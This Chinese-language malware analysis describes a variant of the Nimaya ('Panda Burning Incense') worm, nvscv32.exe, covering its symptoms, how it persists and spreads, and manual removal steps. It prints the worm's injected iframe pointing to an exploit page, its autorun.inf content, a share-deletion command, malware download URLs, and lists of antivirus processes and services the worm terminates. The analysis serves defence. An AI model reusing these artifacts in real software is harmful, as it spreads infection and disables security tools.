中文名称:(尼姆亚,熊猫烧香)
文件名称:nvscv32.exe
病毒名称:目前各杀毒软件无法查杀
病毒大小:68,570 字节
编写语言:Borland Delphi 6.0 - 7.0
加壳方式:FSG 2.0 -> bart/xt
发现时间:2007.1.16
危害等级:高
一、病毒描述:
含 有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器,将自身写入磁盘根目录下,增加一个 Autorun.inf文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,并对局域网其他电脑进行扫描,同时开另外一个线程连 接某网站下载木马程序进行发动恶意攻击。
二:中毒现象: 1:在系统每个分区根目录下存在setup.exe和autorun.inf文件(A和B盘不感染)。
1:在系统每个分区根目录下存在setup.exe和autorun.inf文件(A和B盘不感染)。
2:无法手工修改“文件夹选项”将隐藏文件显示出来。
3:在每个感染后的文件夹中可见Desktop_ini的隐藏文件,内容为感染日期 如:2007-1-16
4:电脑上的所有脚本文件中加入以下代码:<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。
6:不能正常使用任务管理器,SREng.exe等工具。
7:无故的向外发包,连接局域网中其他机器。
三:技术分析
1:病毒文件运行后,将自身复制到%SystemRoot%/system32/drivers/nvscv32.exe
建立注册表自启动项:
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run/]
nvscv32: "C:/WINDOWS/system32/drivers/nvscv32.exe"
2:查找反病毒窗体病毒结束相关进程:
天网防火墙
virusscan
symantec antivirus
system safety monitor
system repair engineer
wrapped gift killer
游戏木马检测大师
超级巡警
3:结束以下进程:
mcshield.exe
vstskmgr.exe
naprdmgr.exe
updaterui.exe
tbmon.exe
scan32.exe
ravmond.exe
ccenter.exe
ravtask.exe
rav.exe
ravmon.exe
ravmond.exe
ravstub.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
frogagent.exe
kvxp.kxp
kvmonxp.kxp
kvcenter.kxp
kvsrvxp.exe
kregex.exe
uihost.exe
trojdie.kxp
frogagent.exe
logo1_.exe
logo_1.exe
rundl132.exe
taskmgr.exe
msconfig.exe
regedit.exe
sreng.exe
4:禁用下列服务:
schedule
sharedaccess
rsccenter
rsravmon
rsccenter
kvwsc
kvsrvxp
kvwsc
kvsrvxp
kavsvc
avp
avp
kavsvc
mcafeeframework
mcshield
mctaskmanager
mcafeeframework
mcshield
mctaskmanager
navapsvc
wscsvc
kpfwsvc
sndsrvc
ccproxy
ccevtmgr
ccsetmgr
spbbcsvc
symantec core lc
npfmntor
mskservice
firesvc
5:删除下列注册表项:
software/microsoft/windows/currentversion/run/ravtask
software/microsoft/windows/currentversion/run/kvmonxp
software/microsoft/windows/currentversion/run/kav
software/microsoft/windows/currentversion/run/kavpersonal50
software/microsoft/windows/currentversion/run/mcafeeupdaterui
software/microsoft/windows/currentversion/run/network associates error reporting service
software/microsoft/windows/currentversion/run/shstatexe
software/microsoft/windows/currentversion/run/ylive.exe
software/microsoft/windows/currentversion/run/yassistse
6:感染所有可执行文件,并将图标改成
(这次不是熊猫烧香那个图标了)
7:跳过下列目录:
windows
winnt
systemvolumeinformation
recycled
windowsnt
windowsupdate
windowsmediaplayer
outlookexpress
netmeeting
commonfiles
complusapplications
commonfiles
messenger
installshieldinstallationinformation
msn
microsoftfrontpage
moviemaker
msngaminzone
8:删除*.gho备份文件.
9:在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统.
autorun.inf内容:
程序代码
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell/Auto/command=setup.exe
10:删除共享:cmd.exe /c net share admin$ /del /y
11: 在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>,此代码地址是一个利用MS-06014漏洞攻击的网页木马,一旦用户浏览中此病毒的服务器 上的网页,如果系统没有打补丁,就会下载执行此病毒。
12:扫描局域网机器,一旦发现漏洞,就迅速传播。
13:在后台访问http://www.whboy.net/update/wormcn.txt,根据下载列表下载其他病毒。
目前下载列表如下:
http://www.krvkr.com/down/cq.exe
http://www.krvkr.com/down/mh.exe
http://www.krvkr.com/down/my.exe
http://www.krvkr.com/down/wl.exe
http://www.krvkr.com/down/rx.exe
http://www.krvkr.com/down/wow.exe
http://www.krvkr.com/down/zt.exe
http://www.krvkr.com/down/wm.exe
http://www.krvkr.com/down/dj.exe
http://www.krvkr.com/cn/iechajian.exe
到此病毒行为分析完毕。
四:解决方案:
1:关闭网络共享,断开网络。
2:结束掉nvscv32.exe进程
3:HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/SHOWALL CheckedValue的数值改为1
4:删除注册表启动项
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run/]
nvscv32: "C:/WINDOWS/system32/drivers/nvscv32.exe"
5:删除C:/WINDOWS/system32/drivers/nvscv32.exe
6:删除每个盘根目录下的autorun.inf文件和setup.exe文件,利用搜索功能,将Desktop_.ini全部删除。
7:如果电脑上有脚本文件,将病毒代码全部删除。
8:关闭系统的自动播放功能。
这样就基本上将病毒清除了
中文名称:(尼姆亚,熊猫烧香)相关推荐
- 熊猫烧香病毒分析与专杀工具
先看看专业分析: Jacks.exe setup.exe 熊猫烧香 尼姆亚 解决方案 档案编号:CISRT2006078 病毒名称:Trojan-PSW.Win32.QQRob.ec(Kaspersk ...
- 熊猫烧香病毒背后,网络高手对决一个月
这是一波电脑病毒蔓延的狂潮.在两个多月的时间里,数百万电脑用户被卷将进去,那只憨态可掬.颔首敬香的"熊猫"除而不尽,成为人们噩梦般的记忆. 反病毒工程师们将它命名为"尼姆 ...
- 熊猫烧香病毒幕后黑手曝光 网络世界高手对决一个月
这是一波电脑病毒蔓延的狂潮.在两个多月的时间里,数百万电脑用户被卷将进去,那只憨态可掬.颔首敬香的"熊猫"除而不尽,成为人们噩梦般的记忆. 反病毒工程师们将它命名为"尼姆 ...
- ==06-07第一网络大事件---熊猫烧香==
这是一波电脑病毒蔓延的狂潮.在两个多月的时间里,数百万电脑用户被卷将进去,那只憨态可掬.颔首敬香的"熊猫"除而不尽,成为人们噩梦般的记忆. "熊猫烧香"考问网络 ...
- 熊猫烧香攻防战 武汉男孩称不再更新版本
2007.01.26 来自:京华时报 "熊猫烧香"考问网络安全 这是一波电脑病毒蔓延的狂潮. 在两个多月的时间里,数百万电脑用户被卷将进去,那只憨态可掬.颔首敬香的"熊 ...
- 熊猫烧香病毒攻击千家网站 (转贴)
核心提示:在两个多月的时间里,"熊猫烧香"病毒迅速化身数百种,不断入侵个人电脑,感染门户网站和近千家大型企业.病毒作者留名"武汉男孩",他对病毒的更新使反毒人士 ...
- 熊猫烧香制造者看守所写下杀毒程序
<script language="javascript" src="http://js4.all4ad.net/mtunion/display.aspx?unio ...
- 三大杀软针对“熊猫烧香”,"科多兽"病毒,以及地震震断光缆的反应
金山26号就公布了该病毒 "熊猫烧香"假慈悲 恶意篡改exe文件,该病毒的资料是25号的 查看该病毒档案及危害方式,并在28号推出了专杀工具 立即下载"武汉男生" ...
- YouTube博主实测病毒之王“熊猫烧香”,当年是它太强还是杀毒软件太弱?
来源|大数据文摘 文|王烨 2007年,有一款电脑病毒席卷大江南北,无论是个人还是企事业单位,电脑纷纷中招,网络一度瘫痪. 这款病毒的特点是被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三 ...
最新文章
- @芥末的糖----------《后端加密》
- 如何快速融入团队(八)
- SCLS:拟南芥二半萜类化合物调控根系微生物组
- java 自动装箱自动拆箱_自动装箱和自动拆箱
- linux添加匿名用户,vsftpd3.0之匿名用户配置
- android studio中连接夜神报错 adb server version doesn't match this client
- android studio 插件开发 FindByTag插件 局部情况下取代ButterKnife插件
- 一致性哈希算法——算法解决的核心问题是当slot数发生变化时,能够尽量少的移动数据...
- 一款基于 Spring Boot 开发 OA 开源产品
- 有关堆栈溢出(in vs 2005)的读书笔记--堆栈中 申请大数组
- linux服务之NIS
- HTML如何实现单元格自动编号,如何在Excel中自动为列编号?
- 【Mac】mac下使用 找不到或无法加载主类
- Asp.net SignalR
- 如果不当程序员,我可以生活的更好么?
- Linux:ubuntu 下安装软件,卸载,查看已经安装的软件
- JavaWeb知识点
- python编程读取文件内容_python编程从入门到实践:读取整个文件和创建包含文件各行的内容...
- Tomcat7下载与安装及eclipse中配置tomcat
- 串口调试工具和串口下载工具的区别